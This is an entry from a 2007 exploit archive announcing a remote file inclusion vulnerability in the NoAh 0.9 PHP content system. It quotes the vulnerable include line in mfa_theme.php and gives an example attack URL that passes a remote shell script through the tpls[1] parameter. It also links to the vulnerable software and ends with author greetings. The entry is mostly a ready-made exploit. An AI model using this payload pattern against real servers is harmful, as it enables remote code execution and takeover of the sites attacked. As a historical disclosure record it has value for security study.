[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NoAh <= 0.9 pre 1.2 (mfa_theme.php) Remote File Inclusion Vulnerability
# Published : 2007-05-06
# Author : kezzap66345
# Previous Title : Berylium2 2003-08-18 (beryliumroot) Remote File Inclusion Vulnerability
# Next Title : XOOPS Module wfquotes 1.0 0 Remote SQL Injection Vulnerability
##############################################################################################
##############################################################################################
#NoAh 0.9 The PHP Content Architect <= Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:noah/modules/noevents/templates/mfa_theme.php
#
<?php include($tpls[1]); ?>
#
#BUG:
#
#Example:http://site.com/path/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[[Sh3LL
Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/project/showfiles.php?group_id=131995&package_id=148681&release_id=318628
##############################################################################################
#
#kezzap66345@hotmail.com
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################
# www.Syue.com [2007-05-06]